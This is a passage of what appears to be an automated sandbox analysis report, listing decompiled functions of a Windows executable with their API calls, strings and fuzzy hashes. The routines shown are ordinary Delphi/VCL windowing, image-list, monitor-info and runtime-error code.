Part of subcall function 004584CC: GetActiveWindow.USER32 ref: 004584F3 Part of subcall function 004584CC: GetLastActivePopup.USER32(?), ref: 00458505 GetWindowRect.USER32 ref: 004571A2 SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004571DA MessageBoxA.USER32 ref: 00457219 SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045728F,?,00000000,00457288), ref: 00457269 SetActiveWindow.USER32(00000000,0045728F,?,00000000,00457288), ref: 0045727A

Strings

( , xrefs: 0045717F cF , xrefs: 0045718E

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Active$LastMessagePopupRect String ID: cF$( API String ID: 3456420849-2654615770 Opcode ID: 8ffb3ed4ba807d08fbadb44ba06598bdbe1bc9adf50b3b3d853d5f2a8d08e838 Instruction ID: e3fa6410cbb3c08fe700889c1ec58b143b8f2f9b644a860e070ba4dfd1801142 Opcode Fuzzy Hash: 8ffb3ed4ba807d08fbadb44ba06598bdbe1bc9adf50b3b3d853d5f2a8d08e838 Instruction Fuzzy Hash: E1511875E04108AFDB44DBA9DD81FAEB7B9FB48301F1445AAF900EB392D678AD048B54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 71%

E0042048C(void* __eax, void* __ebx, void* __edi, void* __esi) { char _v5; intOrPtr* _v12; long _v16; char _v20; char _v24; long _t22; char _t29; void* _t53; intOrPtr _t61; intOrPtr* _t62; intOrPtr _t63; intOrPtr _t66; intOrPtr _t67; void* _t72; void* _t73; intOrPtr _t74; _t72 = _t73; _t74 = _t73 + 0xffffffec; _push(__esi); _push(__edi); _t53 = __eax; _t22 = GetCurrentThreadId(); _t62 = *0x462f38; // 0x463034 if(_t22 != *_t62) { _v24 = GetCurrentThreadId(); _v20 = 0; _t61 = *0x462da0; // 0x416108 E0040C214(_t53, _t61, 1, __edi, __esi, 0, &_v24); E00404184(); } if(_t53 <= 0) { E00420464(); } else { E00420470(_t53); } _v16 = 0; EnterCriticalSection(0x4662e8); _push(_t72); _push(0x420651); _push( *[fs:eax]); *[fs:eax] = _t74; _v16 = InterlockedExchange( &E00461BEC, _v16); _push(_t72); _push(0x420632); _push( *[fs:eax]); *[fs:eax] = _t74; if(_v16 == 0 || *((intOrPtr*)(_v16 + 8)) <= 0) { _t29 = 0; } else { _t29 = 1; } _v5 = _t29; if(_v5 == 0) { L15: _pop(_t63); *[fs:eax] = _t63; _push(E00420639); return E00403928(_v16); } else { if( *((intOrPtr*)(_v16 + 8)) > 0) { _v12 = E0041A80C(_v16, 0); E0041A6F8(_v16, 0); LeaveCriticalSection(0x4662e8); *[fs:eax] = _t74; *[fs:eax] = _t74; *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72, *[fs:eax], 0x4205d5, _t72); _pop(_t66); *[fs:eax] = _t66; _t67 = 0x420596; *[fs:eax] = _t67; _push(E004205DC); EnterCriticalSection(0x4662e8); return 0; } else { goto L15; } } } 0x0042048d 0x0042048f 0x00420493 0x00420494 0x00420495 0x00420497 0x0042049c 0x004204a4 0x004204ab 0x004204ae 0x004204b8 0x004204c5 0x004204ca 0x004204ca 0x004204d1 0x004204dc 0x004204d3 0x004204d5 0x004204d5 0x004204e3 0x004204eb 0x004204f2 0x004204f3 0x004204f8 0x004204fb 0x0042050c 0x00420511 0x00420512 0x00420517 0x0042051a 0x00420521 0x0042052c 0x00420530 0x00420530 0x00420530 0x00420532 0x00420539 0x0042061c 0x0042061e 0x00420621 0x00420624 0x00420631 0x0042053f 0x00420616 0x0042054e 0x00420556 0x00420560 0x00420570 0x0042057e 0x00420589 0x0042058e 0x00420591 0x004205bf 0x004205c2 0x004205c5 0x004205cf 0x004205d4 0x00000000 0x00000000 0x00000000 0x00420616

APIs

GetCurrentThreadId.KERNEL32 ref: 00420497 GetCurrentThreadId.KERNEL32 ref: 004204A6 Part of subcall function 00420464: ResetEvent.KERNEL32(00000254,004204E1,?,?,00000000), ref: 0042046A EnterCriticalSection.KERNEL32(004662E8,?,?,00000000), ref: 004204EB InterlockedExchange.KERNEL32(00461BEC,?), ref: 00420507 LeaveCriticalSection.KERNEL32(004662E8,00000000,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 00420560 EnterCriticalSection.KERNEL32(004662E8,004205DC,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 004205CF

Strings

40F , xrefs: 0042049C

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset String ID: 40F API String ID: 2189153385-2631550472 Opcode ID: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7 Instruction ID: ef1ed86c35f2a73ab8eb88fda658a997fa2195ff33e20d550fe0e6f0303cdae6 Opcode Fuzzy Hash: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7 Instruction Fuzzy Hash: DC31D330B04714BFD701EF65E851A6ABBE8EB49704FA184BBF400E2692D77C9850CE2D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 56%

E004493D8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) { intOrPtr _v8; void* __ecx; intOrPtr _t9; void* _t11; intOrPtr _t17; void* _t28; intOrPtr _t33; intOrPtr _t34; intOrPtr _t37; struct HINSTANCE__* _t41; void* _t43; intOrPtr _t45; intOrPtr _t46; _t45 = _t46; _push(__ebx); _t43 = __edx; _t28 = __eax; if( *0x466574 == 0) { *0x466574 = E0040C9AC("comctl32.dll", __eax); if( *0x466574 >= 0x60000) { _t41 = GetModuleHandleA("comctl32.dll"); if(_t41 != 0) { *0x466578 = GetProcAddress(_t41, "ImageList_WriteEx"); } } } _v8 = E00421180(_t43, 1, 0); _push(_t45); _push(0x4494d2); _push( *[fs:eax]); *[fs:eax] = _t46; if( *0x466578 == 0) { _t9 = _v8; if(_t9 != 0) { _t9 = _t9 - 0xffffffec; } _push(_t9); _t11 = E00448314(_t28); _push(_t11); L004234D8(); if(_t11 == 0) { _t33 = *0x462c60; // 0x423548 E0040C1D8(_t33, 1); E00404184(); } } else { _t17 = _v8; if(_t17 != 0) { _t17 = _t17 - 0xffffffec; } _push(_t17); _push(1); _push(E00448314(_t28)); if( *0x466578() != 0) { _t34 = *0x462c60; // 0x423548 E0040C1D8(_t34, 1); E00404184(); } } _pop(_t37); *[fs:eax] = _t37; _push(0x4494d9); return E00403928(_v8); } 0x004493d9 0x004493dc 0x004493df 0x004493e1 0x004493ea 0x004493f6 0x00449405 0x00449411 0x00449415 0x00449422 0x00449422 0x00449415 0x00449405 0x00449437 0x0044943c 0x0044943d 0x00449442 0x00449445 0x0044944f 0x00449489 0x0044948e 0x00449490 0x00449490 0x00449493 0x00449496 0x0044949b 0x0044949c 0x004494a3 0x004494a5 0x004494b2 0x004494b7 0x004494b7 0x00449451 0x00449451 0x00449456 0x00449458 0x00449458 0x0044945b 0x0044945c 0x00449465 0x0044946e 0x00449470 0x0044947d 0x00449482 0x00449482 0x0044946e 0x004494be 0x004494c1 0x004494c4 0x004494d1

APIs

Part of subcall function 0040C9AC: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,0040CA82), ref: 0040C9EE Part of subcall function 0040C9AC: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,0040CA65,?,00000000,?,00000000,0040CA82), ref: 0040CA23 Part of subcall function 0040C9AC: VerQueryValueA.VERSION(?,0040CA94,?,?,00000000,?,00000000,?,00000000,0040CA65,?,00000000,?,00000000,0040CA82), ref: 0040CA3D GetModuleHandleA.KERNEL32(comctl32.dll), ref: 0044940C GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 0044941D ImageList_Write.COMCTL32(00000000,?,00000000,004494D2), ref: 0044949C

Strings

ImageList_WriteEx , xrefs: 00449417 comctl32.dll , xrefs: 00449407 comctl32.dll , xrefs: 004493EC H5B , xrefs: 00449470, 004494A5

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite String ID: H5B$ImageList_WriteEx$comctl32.dll$comctl32.dll API String ID: 4063495462-2067531044 Opcode ID: 1bd18ea55a635c8a3144036754e74cc9919261c25993034c422739c8a92a9788 Instruction ID: 7feeba355522faf04f3a0e2cb1e42fc148b7a82705179c7db10de74883139383 Opcode Fuzzy Hash: 1bd18ea55a635c8a3144036754e74cc9919261c25993034c422739c8a92a9788 Instruction Fuzzy Hash: 6A21A470704200BBF700EF7AED86A2B37A9AB84758B11013EF801D7391EA7D9D01E65D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E00423010(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) { void _v20; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t24; int _t25; struct HMONITOR__* _t28; struct tagMONITORINFO* _t30; intOrPtr* _t32; _t30 = _a8; _t28 = _a4; if( *0x46633c != 0) { _t25 = 0; if(_t28 == 0x12340042 && _t30 != 0 && _t30->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0, &_v20, 0) != 0) { _t30->rcMonitor.left = 0; _t30->rcMonitor.top = 0; _t30->rcMonitor.right = GetSystemMetrics(0); _t30->rcMonitor.bottom = GetSystemMetrics(1); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t32 = _t30; *(_t32 + 0x24) = 1; if( *_t32 >= 0x48) { lstrcpyA(_t32 + 0x28, "DISPLAY"); } _t25 = 1; } } else { *0x466320 = E00422CE4(4, _t24, *0x466320, _t28, _t30); _t25 = GetMonitorInfoA(_t28, _t30); } return _t25; } 0x00423019 0x0042301c 0x00423026 0x0042304b 0x00423053 0x00423073 0x00423078 0x00423083 0x0042308e 0x00423098 0x00423099 0x0042309a 0x0042309b 0x0042309c 0x0042309d 0x004230a7 0x004230b2 0x004230b2 0x004230b7 0x004230b7 0x00423028 0x0042303a 0x00423047 0x00423047 0x004230c1

APIs

GetMonitorInfoA.USER32(?,?), ref: 00423041 SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423068 GetSystemMetrics.USER32 ref: 0042307D GetSystemMetrics.USER32 ref: 00423088 lstrcpyA.KERNEL32(?,DISPLAY), ref: 004230B2 Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

GetMonitorInfo , xrefs: 00423028 DISPLAY , xrefs: 004230A9

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy String ID: DISPLAY$GetMonitorInfo API String ID: 1539801207-1633989206 Opcode ID: a3a10cab4bb061dffc4b299bcad7828da0626630f6a6faf7876a81cdf98517a1 Instruction ID: 1d13c1e411ecf5a9961b19d848809dc4e278015fb6addf28eb62cabff9c87d63 Opcode Fuzzy Hash: a3a10cab4bb061dffc4b299bcad7828da0626630f6a6faf7876a81cdf98517a1 Instruction Fuzzy Hash: 4F11DC71B003249ED720DF25AC407A7B7F9FB05711F40492AED4597394E7B8AA488BBA

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 56%

E004230E4(intOrPtr _a4, intOrPtr* _a8) { void _v20; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t24; int _t25; intOrPtr _t27; intOrPtr _t28; intOrPtr* _t30; intOrPtr* _t32; _t30 = _a8; _t28 = _a4; if( *0x46633d != 0) { _t25 = 0; if(_t28 == 0x12340042 && _t30 != 0 && *_t30 >= 0x28 && SystemParametersInfoA(0x30, 0, &_v20, 0) != 0) { *((intOrPtr*)(_t30 + 4)) = 0; *((intOrPtr*)(_t30 + 8)) = 0; *((intOrPtr*)(_t30 + 0xc)) = GetSystemMetrics(0); *((intOrPtr*)(_t30 + 0x10)) = GetSystemMetrics(1); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t32 = _t30; *(_t32 + 0x24) = 1; if( *_t32 >= 0x48) { lstrcpyA(_t32 + 0x28, "DISPLAY"); } _t25 = 1; } } else { _t27 = *0x466324; // 0x4230e4 *0x466324 = E00422CE4(5, _t24, _t27, _t28, _t30); _t25 = *0x466324(_t28, _t30); } return _t25; } 0x004230ed 0x004230f0 0x004230fa 0x0042311f 0x00423127 0x00423147 0x0042314c 0x00423157 0x00423162 0x0042316c 0x0042316d 0x0042316e 0x0042316f 0x00423170 0x00423171 0x0042317b 0x00423186 0x00423186 0x0042318b 0x0042318b 0x004230fc 0x00423101 0x0042310e 0x0042311b 0x0042311b 0x00423195

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042313C GetSystemMetrics.USER32 ref: 00423151 GetSystemMetrics.USER32 ref: 0042315C lstrcpyA.KERNEL32(?,DISPLAY), ref: 00423186 Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

GetMonitorInfoA , xrefs: 004230FC 0B , xrefs: 00423101, 0042310E, 00423115 DISPLAY , xrefs: 0042317D

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy String ID: DISPLAY$GetMonitorInfoA$0B API String ID: 2545840971-2122693701 Opcode ID: 6412428992578bdd4025669aefdb9b4bb941a51ac52645d491b848b38ed5ebc5 Instruction ID: 8329856f4a0663fa361ed590d044dbc65a5c11abf511ac1c4802788fd1076b43 Opcode Fuzzy Hash: 6412428992578bdd4025669aefdb9b4bb941a51ac52645d491b848b38ed5ebc5 Instruction Fuzzy Hash: CE11CD71700320AFE7208F64AC447A7B7F8EB09311F40452FED5597281E7B8A950CBA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E004045BC(void* __ecx) { long _v4; int _t3; if( *0x46304c == 0) { if( *0x46102c == 0) { _t3 = MessageBoxA(0, "Runtime error at 00000000", "Error", 0); } return _t3; } else { if( *0x463220 == 0xd7b2 && *0x463228 > 0) { *0x463238(); } WriteFile(GetStdHandle(0xfffffff5), "Runtime error at 00000000", 0x1e, &_v4, 0); return WriteFile(GetStdHandle(0xfffffff5), E00404644, "true", &_v4, 0); } } 0x004045c4 0x00404624 0x00404634 0x00404634 0x0040463a 0x004045c6 0x004045cf 0x004045df 0x004045df 0x004045fb 0x0040461c 0x0040461c

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56,?,0044C980), ref: 004045F5 WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56), ref: 004045FB GetStdHandle.KERNEL32(000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404610 WriteFile.KERNEL32(00000000,000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404616 MessageBoxA.USER32 ref: 00404634

Strings

Runtime error at 00000000 , xrefs: 004045EE, 0040462D Error , xrefs: 00404628

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message String ID: Error$Runtime error at 00000000 API String ID: 1570097196-2970929446 Opcode ID: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7 Instruction ID: 95cfc67e252f177aabf72d71697ea3d849ed0d739da66028a04d1f7d325712f5 Opcode Fuzzy Hash: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7 Instruction Fuzzy Hash: 2CF062A06803C475EA10B7655D46F9622484785F1AF2446BFF310F40F2BAFC89C49B2F

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 55%

E00448638(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) { intOrPtr _v8; struct HDC__* _v12; char _v28; char _v44; void* __edi; void* __ebp; void* _t46; void* _t57; int _t85; void* _t119; void* _t120; void* _t129; struct HDC__* _t138; struct HDC__* _t139; int _t140; void* _t141; _t121 = __ecx; _t137 = __ecx; _v8 = __edx; _t120 = __eax; _t46 = E004481D8(__eax); if(_t46 != 0) { _t144 = _a4; if(_a4 == 0) { __eflags = *(_t120 + 0x54); if( *(_t120 + 0x54) == 0) { _t140 = E00428F64(1); *(_t120 + 0x54) = _t140; E0042A27C(_t140, 1); *((intOrPtr*)( *_t140 + 0x40))(); _t121 = *_t140; *((intOrPtr*)( *_t140 + 0x34))(); } E00426188( *((intOrPtr*)(E00429538( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags); E004193B4(0, *(_t120 + 0x34), 0, &_v44, *(_t120 + 0x30)); _push( &_v44); _t57 = E00429538( *(_t120 + 0x54)); _pop(_t129); E0042652C(_t57, _t129, _t137); _push(0); _push(0); _push(0xffffffff); _push(0); _push(0); _push(0); _push(0); _push(E0042681C(E00429538( *(_t120 + 0x54)))); _push(_v8); _push(E00448314(_t120)); L00423490(); E004193B4(_a16, _a16 + *(_t120 + 0x34), _a12, &_v28, _a12 + *(_t120 + 0x30)); _v12 = E0042681C(E00429538( *(_t120 + 0x54))); E00426188( *((intOrPtr*)(_t137 + 0x14)), _a16 + *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags); _t138 = E0042681C(_t137); SetTextColor(_t138, 0xffffff); SetBkColor(_t138, 0); _t85 = _a16 + 1; __eflags = _t85; BitBlt(_t138, _t85, _a12 + 1, *(_t120 + 0x34), *(_t120 + 0x30), _v12, 0, 0, 0xe20746); E00426188( *((intOrPtr*)(_t137 + 0x14)), _a16 + *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85); _t139 = E0042681C(_t137); SetTextColor(_t139, 0xffffff); SetBkColor(_t139, 0); return BitBlt(_t139, _a16, _a12, *(_t120 + 0x34), *(_t120 + 0x30), _v12, 0, 0, 0xe20746); } _push(_a8); _push(E00448028(_t144)); E00448610(_t120, _t144); _push(E00448028(_t144)); _push(0); _push(0); _push(_a12); _push(_a16); _push(E0042681C(__ecx)); _push(_v8); _t119 = E00448314(_t120); _push(_t119); L00423490(); return _t119; } return _t46; } 0x00448638 0x00448641 0x00448643 0x00448646 0x0044864a 0x00448651 0x00448657 0x0044865b 0x004486a1 0x004486a5 0x004486b3 0x004486b5 0x004486bc 0x004486c8 0x004486d0 0x004486d2 0x004486d2 0x004486e5 0x004486f9 0x00448701 0x00448705 0x0044870a 0x0044870b 0x00448710 0x00448712 0x00448714 0x00448716 0x00448718 0x0044871a 0x0044871c 0x0044872b 0x0044872f 0x00448737 0x00448738 0x00448754 0x00448766 0x00448771 0x0044877d 0x00448785 0x0044878d 0x004487af 0x004487af 0x004487b2 0x004487bf 0x004487cb 0x004487d3 0x004487db 0x00000000 0x004487fe 0x00448660 0x00448669 0x0044866c 0x00448676 0x00448677 0x00448679 0x0044867e 0x00448682 0x0044868a 0x0044868e 0x00448691 0x00448696 0x00448697 0x00000000 0x00448697 0x00448809

APIs

ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00448697 ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448738 SetTextColor.GDI32(00000000,00FFFFFF), ref: 00448785 SetBkColor.GDI32(00000000,00000000), ref: 0044878D BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 004487B2 Part of subcall function 00448610: ImageList_GetBkColor.COMCTL32(00000000,?,00448671,00000000,?), ref: 00448626

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorImageList_$Draw$Text String ID: API String ID: 2027629008-0 Opcode ID: 4094665da36111d1273b04d8056914dd580bcbf9be6dc5764fec73b4cc8f8cb7 Instruction ID: c7ff4466aff230b0ce27f37bc18780dc13651bfdc4d4199a20c36a001531123d Opcode Fuzzy Hash: 4094665da36111d1273b04d8056914dd580bcbf9be6dc5764fec73b4cc8f8cb7 Instruction Fuzzy Hash: F2512D71700114ABDB50FF69DD82F9E37E8AF48704F50005AFA04EB286CA78EC519B69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%

E00453544(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) { intOrPtr* _v8; intOrPtr _v12; intOrPtr _v16; intOrPtr _v20; short _v22; intOrPtr _v28; struct HWND__* _v32; char _v36; intOrPtr _t55; intOrPtr _t61; intOrPtr _t67; intOrPtr _t68; intOrPtr _t71; intOrPtr _t72; intOrPtr _t74; intOrPtr _t76; intOrPtr _t86; intOrPtr _t88; intOrPtr _t91; void* _t96; intOrPtr _t105; intOrPtr _t133; void* _t135; void* _t138; void* _t139; intOrPtr _t140; _t136 = __esi; _t135 = __edi; _t116 = __ebx; _t138 = _t139; _t140 = _t139 + 0xffffffe0; _push(__ebx); _push(__esi); _v36 = 0; _v8 = __eax; _push(_t138); _push(0x453836); _push( *[fs:eax]); *[fs:eax] = _t140; E00438F48(); if( *((char*)(_v8 + 0x57)) != 0 || *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x358) & 0x00000008) != 0 || *((char*)(_v8 + 0x277)) == 1) { _t55 = *0x462cd4; // 0x423580 E00406740(_t55, &_v36); E0040C11C(_v36, 1); E00404184(); } if(GetCapture() != 0) { SendMessageA(GetCapture(), 0x1f, 0, 0); } ReleaseCapture(); _t61 = *0x466580; // 0x27bf470 E00455C64(_t61); _push(_t138); _push(0x453819); _push( *[fs:edx]); *[fs:edx] = _t140; *(_v8 + 0x358) = *(_v8 + 0x358) | 0x00000008; if( *((char*)(_v8 + 0x330)) == 0) { _t105 = *0x466580; // 0x27bf470 if( *((char*)(_t105 + 0xd4)) != 0) { E0043F0FC(_v8); E004423D4(_v8); } } _v32 = GetActiveWindow(); _v20 = E0044C924(); _t67 = *0x466584; // 0x27c66a0 _t68 = *0x466584; // 0x27c66a0 E0041A888( *((intOrPtr*)(_t68 + 0x7c)), *((intOrPtr*)(_t67 + 0x78)), 0); _t71 = *0x466584; // 0x27c66a0 *((intOrPtr*)(_t71 + 0x78)) = _v8; _t72 = *0x466584; // 0x27c66a0 _v22 = *(_t72 + 0x44) & 0x0000ffff; _t74 = *0x466584; // 0x27c66a0 E00454B28(_t74, 0); _t76 = *0x466584; // 0x27c66a0 _v28 = *((intOrPtr*)(_t76 + 0x48)); _v16 = E0044CA08(0, _t116, _t135, _t136); _push(_t138); _push(0x4537f7); _push( *[fs:edx]); *[fs:edx] = _t140; E00453454(_v8); _push(_t138); _push(0x453756); _push( *[fs:edx]); *[fs:edx] = _t140; SendMessageA(E004423F8(_v8), 0xb000, 0, 0); *((intOrPtr*)(_v8 + 0x294)) = 0; do { _t86 = *0x466580; // 0x27bf470 E00456DA0(_t86); _t88 = *0x466580; // 0x27bf470 if( *((char*)(_t88 + 0xa4)) == 0) { if( *((intOrPtr*)(_v8 + 0x294)) != 0) { E004533B4(_v8); } } else { *((intOrPtr*)(_v8 + 0x294)) = 2; } _t91 = *((intOrPtr*)(_v8 + 0x294)); } while (_t91 == 0); _v12 = _t91; SendMessageA(E004423F8(_v8), 0xb001, 0, 0); _t96 = E004423F8(_v8); if(_t96 != GetActiveWindow()) { _v32 = 0; } _pop(_t133); *[fs:eax] = _t133; _push(0x45375d); return E0045344C(); } 0x00453544 0x00453544 0x00453544 0x00453545 0x00453547 0x0045354a 0x0045354b 0x0045354e 0x00453551 0x00453556 0x00453557 0x0045355c 0x0045355f 0x00453562 0x0045356e 0x00453597 0x0045359c 0x004535ab 0x004535b0 0x004535b0 0x004535bc 0x004535ca 0x004535ca 0x004535cf 0x004535d4 0x004535d9 0x004535e0 0x004535e1 0x004535e6 0x004535e9 0x004535ef 0x00453600 0x00453602 0x0045360e 0x00453613 0x0045361b 0x0045361b 0x0045360e 0x00453625 0x0045362d 0x00453630 0x00453638 0x00453642 0x00453647 0x0045364f 0x00453652 0x0045365b 0x00453661 0x00453666 0x0045366b 0x00453673 0x0045367d 0x00453682 0x00453683 0x00453688 0x0045368b 0x00453691 0x00453698 0x00453699 0x0045369e 0x004536a1 0x004536b6 0x004536c0 0x004536c6 0x004536c6 0x004536cb 0x004536d0 0x004536dc 0x004536f7 0x004536fc 0x004536fc 0x004536de 0x004536e1 0x004536e1 0x00453704 0x0045370a 0x0045370e 0x00453723 0x0045372b 0x00453739 0x0045373d 0x0045373d 0x00453742 0x00453745 0x00453748 0x00453755

APIs

GetCapture.USER32 ref: 004535B5 GetCapture.USER32 ref: 004535C4 SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004535CA ReleaseCapture.USER32(00000000,00453836), ref: 004535CF GetActiveWindow.USER32 ref: 00453620 SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 004536B6 SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00453723 GetActiveWindow.USER32 ref: 00453732

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release String ID: API String ID: 862346643-0 Opcode ID: 9e28f5377d61abf311c9daef1181d16d300c76bc30cf22954581ec0863c717ce Instruction ID: c71c2c127747cc088a0eefe62a95ea86982853baf425fc74ebc282f5ae4e7b0f Opcode Fuzzy Hash: 9e28f5377d61abf311c9daef1181d16d300c76bc30cf22954581ec0863c717ce Instruction Fuzzy Hash: AA519F70A00244AFDB11EF65C986B5D77F1EF49345F1544BAF804AB3A2EB78AE44CB08

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

